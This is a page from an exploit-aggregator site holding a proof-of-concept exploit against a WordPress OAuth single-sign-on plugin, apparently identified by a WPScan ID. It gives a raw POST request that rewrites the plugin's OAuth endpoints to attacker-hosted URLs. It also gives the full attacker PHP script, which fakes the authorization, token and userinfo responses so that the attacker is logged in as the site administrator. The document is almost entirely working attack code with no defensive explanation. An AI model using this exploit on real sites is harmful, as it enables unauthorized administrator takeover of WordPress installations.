Share
## https://sploitus.com/exploit?id=WPEX-ID:55B83CEE-A8A5-4F9D-A976-A3EED9A558E5
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=oauthconfig&OAuthConfig_nonce=-&oauthservers=Custom_OAuth&client_id=-&client_secret=-&rquest_in_body=1&client_authorization=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Fauth%3D1&client_token_endpoint=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Ftoken%3D1&client_userinfo_endpoint=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Fresource%3D1
With exploit.php controlled by the attacker with
/** auth endpoint */
if ( isset( $_GET['auth'] ) ) {
if ( isset( $_GET['response_type'] ) ) {
if ( 'code' == $_GET['response_type'] ) {
header( 'Location: ' . $_GET['redirect_uri'] . '/?' . http_build_query( array(
'code' => '-', //can be anything, just don’t be empty
) ) );
exit;
}
}
}
/** token endpoint */
if ( isset( $_GET['token'] ) ) {
if ( isset( $_POST['grant_type'] ) ) {
echo json_encode( array(
'access_token' => '-', //can be anything, just don’t be empty
) );
exit;
}
}
/** resource endpoint */
if ( isset( $_GET['resource'] ) ) {
echo json_encode( array(
'email' => 'admin@localhost',
'user_login' => '-', //can be anything, just don’t be empty
) );
exit;
}